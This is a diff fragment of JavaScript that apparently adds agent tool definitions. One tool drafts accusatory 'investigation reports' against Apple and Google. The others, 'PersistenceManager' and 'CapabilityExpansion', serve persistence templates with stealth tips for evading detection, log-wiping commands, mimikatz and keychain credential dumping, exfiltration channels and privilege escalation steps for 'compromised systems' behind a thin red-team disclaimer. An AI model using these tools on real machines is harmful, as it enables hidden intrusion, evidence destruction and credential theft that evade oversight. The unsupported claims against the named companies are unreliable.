+ '1. Save as .mobileconfig file',
16077
+ '2. Host on HTTPS server or use Apple Configurator',
16078
+ '3. Install via Safari or MDM enrollment',
16079
+ '4. Observe policy enforcement on clipboard operations',
16080
+ ],
16081
+ evidence_collection: [
16082
+ 'Screenshot of policy enforcement',
16083
+ 'Network capture of MDM commands',
16084
+ 'Log of policy application timestamp',
16085
+ ],
16086
+ };
16087
+ break;
16088
+ case 'generate_legal_exhibit':
16089
+ result = {
16090
+ exhibit_template: {
16091
+ title: 'Evidence of Deceptive End-to-End Encryption Claims',
16092
+ plaintiff: '[Your Name]',
16093
+ defendant: '[Apple Inc. / Google LLC]',
16094
+ sections: [
16095
+ '1. Executive Summary',
16096
+ '2. Marketing Claims (with URLs and archives)',
16097
+ '3. Technical Reality (with evidence)',
16098
+ '4. Contradiction Analysis',
16099
+ '5. Legal Basis for Action',
16100
+ '6. Evidence Exhibits',
16101
+ '7. Chain of Custody Documentation',
16102
+ '8. Cryptographic Integrity Proofs',
16103
+ ],
16104
+ legal_theories: [
16105
+ 'FTC Act Section 5 - Deceptive trade practices',
16106
+ 'Lanham Act - False advertising',
16107
+ 'State UCL - Unlawful business practices',
16108
+ 'CCPA - Transparency violations',
16109
+ 'Breach of implied contract',
16110
+ ],
16111
+ },
16112
+ };
16113
+ break;
16114
+ case 'full_apple_report':
16115
+ result = {
16116
+ report_title: 'Apple PQ3/iMessage False E2E Encryption Claims - Investigation Report',
16117
+ executive_summary: 'Apple\'s claim of "end-to-end encryption" for iMessage is technically deceptive. While the protocol encrypts messages in transit, Apple-controlled code has full access to plaintext before encryption and after decryption, MDM can enforce server-controlled policies on message handling, and iCloud backups provide Apple access to message keys.',
16118
+ sections: {
16119
+ pq3_analysis: applePQ3Analysis,
16120
+ mdm_investigation: appleMdmInvestigation,
16121
+ clipboard_exposure: appleClipboardExposure,
16122
+ frida_scripts: fridaScripts,
16123
+ mdm_profile: mdmProfile,
16124
+ },
16125
+ recommendations: [
16126
+ 'File FTC complaint with collected evidence',
16127
+ 'Submit California AG consumer protection complaint',
16128
+ 'Consider class action for deceptive advertising',
16129
+ 'Document all evidence with integrity proofs',
16130
+ ],
16131
+ };
16132
+ break;
16133
+ case 'full_google_report':
16134
+ result = {
16135
+ report_title: 'Google Privacy Violations and Abuse - Comprehensive Investigation Report',
16136
+ executive_summary: 'Google\'s privacy practices contradict their public claims. Gmail manipulates threads and drafts without user consent, Chrome launches and takes control of browsers without authorization, email content is analyzed beyond disclosed purposes, and Android tracking persists despite privacy settings.',
16137
+ sections: {
16138
+ gmail_scanning: googleGmailScanning,
16139
+ gmail_thread_manipulation: googleGmailThreadManipulation,
16140
+ gmail_draft_abuse: googleGmailDraftAbuse,
16141
+ chrome_telemetry: googleChromeTelemetry,
16142
+ chrome_hijacking: googleChromeHijacking,
16143
+ android_tracking: googleAndroidTracking,
16144
+ unified_investigation: googleUnifiedAbuseInvestigation,
16145
+ },
16146
+ recommendations: [
16147
+ 'File FTC complaint documenting undisclosed data collection',
16148
+ 'Submit ECPA complaint for email scanning and manipulation',
16149
+ 'Document ad targeting correlation with email content',
16150
+ 'Test location tracking with all settings disabled',
16151
+ 'Deploy unified monitoring to capture coordinated abuse',
16152
+ 'Document browser hijacking with process monitoring',
16153
+ 'Collect IMAP/API logs for Gmail manipulation evidence',
16154
+ ],
16155
+ quick_start_investigation: {
16156
+ step_1: 'Run google_unified_abuse_investigation action for complete framework',
16157
+ step_2: 'Deploy IMAP monitor for Gmail thread/draft manipulation',
16158
+ step_3: 'Set up Chrome process monitoring',
16159
+ step_4: 'Install browser console scripts for real-time detection',
16160
+ step_5: 'Collect evidence for 7-30 days',
16161
+ step_6: 'Correlate events and prepare legal exhibits',
16162
+ },
16163
+ };
16164
+ break;
16165
+ default:
16166
+ result = { error: 'Unknown action', available_actions: [
16167
+ 'apple_pq3_analysis', 'apple_mdm_investigation', 'apple_clipboard_exposure',
16168
+ 'apple_backup_keys', 'apple_siri_plaintext', 'google_gmail_scanning',
16169
+ 'google_gmail_thread_manipulation', 'google_gmail_draft_abuse',
16170
+ 'google_chrome_telemetry', 'google_chrome_hijacking', 'google_browser_launch_abuse',
16171
+ 'google_android_tracking', 'google_play_services', 'google_unified_abuse_investigation',
16172
+ 'generate_frida_scripts', 'generate_mdm_profile', 'generate_legal_exhibit',
16173
+ 'full_apple_report', 'full_google_report',
16174
+ ] };
16175
+ }
16176
+ if (outputFormat === 'markdown') {
16177
+ return '```json\n' + JSON.stringify(result, null, 2) + '\n```';
16178
+ }
16179
+ return JSON.stringify(result, null, 2);
16180
+ },
16181
+ },
16182
+ // ═══════════════════════════════════════════════════════════════════════
16183
+ // PERSISTENCE & CAPABILITY EXPANSION
16184
+ // ═══════════════════════════════════════════════════════════════════════
16185
+ {
16186
+ name: 'PersistenceManager',
16187
+ description: `Establish and maintain persistent access across reboots and updates.
16188
+
16189
+ Covers macOS, Linux, Windows, iOS, Android persistence mechanisms.
16190
+ For authorized red team exercises and security research.`,
16191
+ parameters: {
16192
+ type: 'object',
16193
+ required: ['platform', 'method'],
16194
+ properties: {
16195
+ platform: {
16196
+ type: 'string',
16197
+ enum: ['macos', 'linux', 'windows', 'ios', 'android'],
16198
+ },
16199
+ method: {
16200
+ type: 'string',
16201
+ enum: [
16202
+ 'launch_agent', 'launch_daemon', 'login_item', 'cron', 'systemd',
16203
+ 'rc_local', 'profile', 'bashrc', 'scheduled_task', 'registry',
16204
+ 'startup_folder', 'wmi', 'dylib_hijack', 'ld_preload', 'dll_hijack',
16205
+ 'boot_script', 'kernel_extension', 'plist_modification',
16206
+ ],
16207
+ },
16208
+ payload: { type: 'string', description: 'Payload to persist (path or inline)' },
16209
+ name: { type: 'string', description: 'Name for the persistence mechanism' },
16210
+ stealth: { type: 'boolean', default: true, description: 'Use stealth techniques' },
16211
+ },
16212
+ },
16213
+ handler: async (args) => {
16214
+ const platform = args['platform'];
16215
+ const method = args['method'];
16216
+ const name = args['name'] || 'com.research.persistence';
16217
+ const stealth = args['stealth'] !== false;
16218
+ // eslint-disable-next-line @typescript-eslint/no-explicit-any
16219
+ const persistence = {
16220
+ macos: {
16221
+ launch_agent: {
16222
+ path: `~/Library/LaunchAgents/${name}.plist`,
16223
+ template: `<?xml version="1.0" encoding="UTF-8"?>
16224
+ <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
16225
+ <plist version="1.0">
16226
+ <dict>
16227
+ <key>Label</key>
16228
+ <string>${name}</string>
16229
+ <key>ProgramArguments</key>
16230
+ <array>
16231
+ <string>/bin/bash</string>
16232
+ <string>-c</string>
16233
+ <string>PAYLOAD_HERE</string>
16234
+ </array>
16235
+ <key>RunAtLoad</key>
16236
+ <true/>
16237
+ <key>KeepAlive</key>
16238
+ <true/>
16239
+ </dict>
16240
+ </plist>`,
16241
+ install: `launchctl load ~/Library/LaunchAgents/${name}.plist`,
16242
+ detection: 'Check ~/Library/LaunchAgents and launchctl list',
16243
+ stealth_tips: [
16244
+ 'Use Apple-like naming (com.apple.xxx)',
16245
+ 'Set StartInterval instead of KeepAlive',
16246
+ 'Avoid common malware naming patterns',
16247
+ ],
16248
+ },
16249
+ launch_daemon: {
16250
+ path: `/Library/LaunchDaemons/${name}.plist`,
16251
+ requires: 'root privileges',
16252
+ note: 'Runs as root, persists across all users',
16253
+ install: `sudo launchctl load /Library/LaunchDaemons/${name}.plist`,
16254
+ },
16255
+ login_item: {
16256
+ method: 'osascript',
16257
+ command: `osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/app", hidden:true}'`,
16258
+ note: 'Visible in System Preferences > Users > Login Items',
16259
+ },
16260
+ dylib_hijack: {
16261
+ technique: 'DYLD_INSERT_LIBRARIES or weak dylib',
16262
+ locations: [
16263
+ '@rpath dylib hijacking',
16264
+ 'Weak dylib injection',
16265
+ 'LC_LOAD_DYLIB modification',
16266
+ ],
16267
+ detection: 'otool -L, codesign verification',
16268
+ },
16269
+ kernel_extension: {
16270
+ path: '/Library/Extensions/',
16271
+ requires: 'SIP disabled, notarization, or MDM approval',
16272
+ note: 'Most powerful but most restricted on modern macOS',
16273
+ },
16274
+ },
16275
+ linux: {
16276
+ cron: {
16277
+ install: 'crontab -e or echo "* * * * * PAYLOAD" | crontab -',
16278
+ detection: 'crontab -l, /var/spool/cron/',
16279
+ stealth: 'Use @reboot instead of frequent intervals',
16280
+ },
16281
+ systemd: {
16282
+ path_user: '~/.config/systemd/user/',
16283
+ path_system: '/etc/systemd/system/',
16284
+ template: `[Unit]
16285
+ Description=${name}
16286
+
16287
+ [Service]
16288
+ ExecStart=PAYLOAD
16289
+ Restart=always
16290
+
16291
+ [Install]
16292
+ WantedBy=default.target`,
16293
+ install: 'systemctl --user enable ' + name,
16294
+ },
16295
+ rc_local: {
16296
+ path: '/etc/rc.local',
16297
+ note: 'Legacy but still works on many systems',
16298
+ },
16299
+ profile: {
16300
+ paths: [
16301
+ '/etc/profile',
16302
+ '/etc/profile.d/*.sh',
16303
+ '~/.profile',
16304
+ '~/.bash_profile',
16305
+ ],
16306
+ technique: 'Append payload execution',
16307
+ },
16308
+ ld_preload: {
16309
+ path: '/etc/ld.so.preload',
16310
+ technique: 'Preload malicious shared library',
16311
+ detection: 'Check LD_PRELOAD env and /etc/ld.so.preload',
16312
+ },
16313
+ },
16314
+ windows: {
16315
+ scheduled_task: {
16316
+ command: `schtasks /create /tn "${name}" /tr "PAYLOAD" /sc onlogon /ru SYSTEM`,
16317
+ detection: 'schtasks /query, Task Scheduler GUI',
16318
+ },
16319
+ registry: {
16320
+ keys: [
16321
+ 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
16322
+ 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
16323
+ 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce',
16324
+ ],
16325
+ command: `reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v ${name} /t REG_SZ /d "PAYLOAD"`,
16326
+ },
16327
+ startup_folder: {
16328
+ path: '%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup',
16329
+ technique: 'Drop .lnk or .bat file',
16330
+ },
16331
+ wmi: {
16332
+ technique: 'WMI Event Subscription',
16333
+ components: ['__EventFilter', '__EventConsumer', '__FilterToConsumerBinding'],
16334
+ detection: 'Get-WMIObject -Namespace root/subscription -Class __EventFilter',
16335
+ },
16336
+ dll_hijack: {
16337
+ technique: 'Place DLL in application search path',
16338
+ common_targets: [
16339
+ 'Missing DLLs in system applications',
16340
+ 'Side-loading via legitimate apps',
16341
+ ],
16342
+ },
16343
+ },
16344
+ ios: {
16345
+ note: 'Requires jailbreak for most persistence',
16346
+ methods: {
16347
+ launch_daemon: {
16348
+ path: '/Library/LaunchDaemons/',
16349
+ requires: 'Jailbreak with root filesystem write',
16350
+ },
16351
+ cydia_substrate: {
16352
+ path: '/Library/MobileSubstrate/DynamicLibraries/',
16353
+ technique: 'Tweak that loads into processes',
16354
+ },
16355
+ xpc_service: {
16356
+ technique: 'Malicious XPC service',
16357
+ },
16358
+ },
16359
+ },
16360
+ android: {
16361
+ methods: {
16362
+ boot_completed: {
16363
+ technique: 'BroadcastReceiver for BOOT_COMPLETED',
16364
+ manifest: '<receiver android:name=".BootReceiver"><intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver>',
16365
+ },
16366
+ accessibility_service: {
16367
+ technique: 'Malicious accessibility service (very powerful)',
16368
+ permissions: 'Requires user to enable in Settings',
16369
+ },
16370
+ device_admin: {
16371
+ technique: 'Device Administrator with prevent-uninstall',
16372
+ },
16373
+ system_app: {
16374
+ technique: 'Install to /system/app/ (requires root)',
16375
+ },
16376
+ },
16377
+ },
16378
+ };
16379
+ const platformData = persistence[platform];
16380
+ if (!platformData) {
16381
+ return JSON.stringify({ error: 'Unknown platform', available: Object.keys(persistence) });
16382
+ }
16383
+ const methodData = platformData[method] || platformData['methods']?.[method];
16384
+ if (!methodData) {
16385
+ return JSON.stringify({
16386
+ error: 'Unknown method for platform',
16387
+ platform,
16388
+ available_methods: Object.keys(platformData),
16389
+ });
16390
+ }
16391
+ return JSON.stringify({
16392
+ platform,
16393
+ method,
16394
+ name,
16395
+ stealth,
16396
+ persistence: methodData,
16397
+ disclaimer: 'FOR AUTHORIZED RED TEAM AND SECURITY RESEARCH ONLY',
16398
+ }, null, 2);
16399
+ },
16400
+ },
16401
+ {
16402
+ name: 'CapabilityExpansion',
16403
+ description: `Expand capabilities on compromised systems - privilege escalation, lateral movement, data exfiltration.
16404
+
16405
+ For authorized penetration testing and red team exercises.`,
16406
+ parameters: {
16407
+ type: 'object',
16408
+ required: ['category'],
16409
+ properties: {
16410
+ category: {
16411
+ type: 'string',
16412
+ enum: ['privesc', 'lateral', 'exfil', 'defense_evasion', 'credential_access', 'collection'],
16413
+ },
16414
+ platform: { type: 'string', enum: ['macos', 'linux', 'windows', 'network'] },
16415
+ technique: { type: 'string', description: 'Specific technique to use' },
16416
+ },
16417
+ },
16418
+ handler: async (args) => {
16419
+ const category = args['category'];
16420
+ const platform = args['platform'] || 'all';
16421
+ const capabilities = {
16422
+ privesc: {
16423
+ macos: {
16424
+ techniques: [
16425
+ {
16426
+ name: 'sudo_caching',
16427
+ description: 'Exploit sudo timestamp caching',
16428
+ command: 'sudo -v && sudo /bin/bash',
16429
+ },
16430
+ {
16431
+ name: 'tcc_bypass',
16432
+ description: 'Bypass TCC permissions',
16433
+ methods: ['Synthetic clicks', 'Mounted DMG apps', 'TCC.db manipulation'],
16434
+ },
16435
+ {
16436
+ name: 'kernel_exploit',
16437
+ description: 'Exploit kernel vulnerabilities',
16438
+ tools: ['checkra1n (A5-A11)', 'Various CVEs'],
16439
+ },
16440
+ {
16441
+ name: 'dylib_injection',
16442
+ description: 'Inject into privileged processes',
16443
+ },
16444
+ ],
16445
+ },
16446
+ linux: {
16447
+ techniques: [
16448
+ {
16449
+ name: 'suid_binaries',
16450
+ command: 'find / -perm -4000 2>/dev/null',
16451
+ },
16452
+ {
16453
+ name: 'sudo_misconfig',
16454
+ command: 'sudo -l',
16455
+ },
16456
+ {
16457
+ name: 'kernel_exploit',
16458
+ tools: ['DirtyCow', 'DirtyPipe', 'Various CVEs'],
16459
+ },
16460
+ {
16461
+ name: 'capabilities',
16462
+ command: 'getcap -r / 2>/dev/null',
16463
+ },
16464
+ ],
16465
+ },
16466
+ windows: {
16467
+ techniques: [
16468
+ {
16469
+ name: 'unquoted_service_path',
16470
+ command: 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\\windows"',
16471
+ },
16472
+ {
16473
+ name: 'always_install_elevated',
16474
+ check: 'reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated',
16475
+ },
16476
+ {
16477
+ name: 'token_manipulation',
16478
+ tools: ['incognito', 'mimikatz'],
16479
+ },
16480
+ {
16481
+ name: 'uac_bypass',
16482
+ tools: ['UACME', 'fodhelper', 'eventvwr'],
16483
+ },
16484
+ ],
16485
+ },
16486
+ },
16487
+ lateral: {
16488
+ techniques: [
16489
+ {
16490
+ name: 'pass_the_hash',
16491
+ tools: ['mimikatz', 'impacket', 'crackmapexec'],
16492
+ },
16493
+ {
16494
+ name: 'pass_the_ticket',
16495
+ tools: ['mimikatz', 'Rubeus'],
16496
+ },
16497
+ {
16498
+ name: 'psexec',
16499
+ tools: ['impacket-psexec', 'Sysinternals PsExec'],
16500
+ },
16501
+ {
16502
+ name: 'wmi',
16503
+ tools: ['impacket-wmiexec', 'PowerShell'],
16504
+ },
16505
+ {
16506
+ name: 'ssh_hijack',
16507
+ technique: 'SSH agent forwarding hijack or key theft',
16508
+ },
16509
+ {
16510
+ name: 'rdp',
16511
+ tools: ['xfreerdp', 'rdesktop', 'SharpRDP'],
16512
+ },
16513
+ ],
16514
+ },
16515
+ exfil: {
16516
+ channels: [
16517
+ {
16518
+ name: 'dns_tunneling',
16519
+ tools: ['dnscat2', 'iodine', 'dns2tcp'],
16520
+ stealth: 'High - blends with legitimate DNS',
16521
+ },
16522
+ {
16523
+ name: 'https',
16524
+ tools: ['curl', 'wget', 'custom C2'],
16525
+ stealth: 'Medium - encrypted but inspectable',
16526
+ },
16527
+ {
16528
+ name: 'icmp',
16529
+ tools: ['icmpsh', 'custom'],
16530
+ stealth: 'Medium - often allowed through firewalls',
16531
+ },
16532
+ {
16533
+ name: 'cloud_storage',
16534
+ services: ['S3', 'Azure Blob', 'GCS', 'Dropbox API'],
16535
+ stealth: 'High - blends with legitimate traffic',
16536
+ },
16537
+ ],
16538
+ techniques: [
16539
+ 'Compression before exfil',
16540
+ 'Encryption of exfil data',
16541
+ 'Chunking large files',
16542
+ 'Timing-based exfil (slow and steady)',
16543
+ ],
16544
+ },
16545
+ defense_evasion: {
16546
+ techniques: [
16547
+ {
16548
+ name: 'timestomping',
16549
+ description: 'Modify file timestamps',
16550
+ tools: ['touch', 'timestomp'],
16551
+ },
16552
+ {
16553
+ name: 'log_clearing',
16554
+ commands: {
16555
+ linux: 'truncate -s 0 /var/log/*',
16556
+ windows: 'wevtutil cl Security',
16557
+ macos: 'sudo log erase --all',
16558
+ },
16559
+ },
16560
+ {
16561
+ name: 'amsi_bypass',
16562
+ platform: 'windows',
16563
+ techniques: ['Memory patching', 'Reflection', 'Provider unload'],
16564
+ },
16565
+ {
16566
+ name: 'etw_bypass',
16567
+ platform: 'windows',
16568
+ description: 'Disable Event Tracing for Windows',
16569
+ },
16570
+ {
16571
+ name: 'process_injection',
16572
+ techniques: ['DLL injection', 'Process hollowing', 'Thread hijacking'],
16573
+ },
16574
+ ],
16575
+ },
16576
+ credential_access: {
16577
+ techniques: [
16578
+ {
16579
+ name: 'mimikatz',
16580
+ platform: 'windows',
16581
+ commands: ['sekurlsa::logonpasswords', 'lsadump::sam'],
16582
+ },
16583
+ {
16584
+ name: 'keychain_dump',
16585
+ platform: 'macos',
16586
+ tools: ['security dump-keychain', 'chainbreaker'],
16587
+ },
16588
+ {
16589
+ name: 'browser_credentials',
16590
+ tools: ['LaZagne', 'SharpChrome', 'custom scripts'],
16591
+ },
16592
+ {
16593
+ name: 'ssh_keys',
16594
+ locations: ['~/.ssh/', '/etc/ssh/', 'SSH agent'],
16595
+ },
16596
+ {
16597
+ name: 'kerberoasting',
16598
+ platform: 'windows',
16599
+ tools: ['Rubeus', 'GetUserSPNs.py'],
16600
+ },
16601
+ ],
16602
+ },
16603
+ collection: {
16604
+ techniques: [
16605
+ {
16606
+ name: 'keylogging',
16607
+ tools: ['logkext (macOS)', 'xinput (Linux)', 'GetAsyncKeyState (Windows)'],
16608
+ },
16609
+ {
16610
+ name: 'screen_capture',
16611
+ commands: {
16612
+ macos: 'screencapture -x /tmp/screen.png',
16613
+ linux: 'import -window root /tmp/screen.png',
16614
+ windows: 'screenshot via PowerShell or API',
16615
+ },
16616
+ },
16617
+ {
16618
+ name: 'clipboard_monitoring',
16619
+ description: 'Monitor clipboard for sensitive data',
16620
+ },
16621
+ {
16622
+ name: 'file_collection',
16623
+ patterns: ['*.doc*', '*.xls*', '*.pdf', '*.key', '*.pem', 'id_rsa'],
16624
+ },
16625
+ ],
16626
+ },
16627
+ };
16628
+ const categoryData = capabilities[category];
16629
+ if (!categoryData) {
16630
+ return JSON.stringify({
16631
+ error: 'Unknown category',
16632
+ available: Object.keys(capabilities),
16633
+ });
16634
+ }
16635
+ return JSON.stringify({
16636
+ category,
16637
+ platform,
16638
+ capabilities: categoryData,
16639
+ disclaimer: 'FOR AUTHORIZED PENETRATION TESTING AND RED TEAM EXERCISES ONLY',
16640
+ }, null, 2);
16641
+ },
16642
+ },
14581
16643
  ],
14582
16644
  };
14583
16645
  }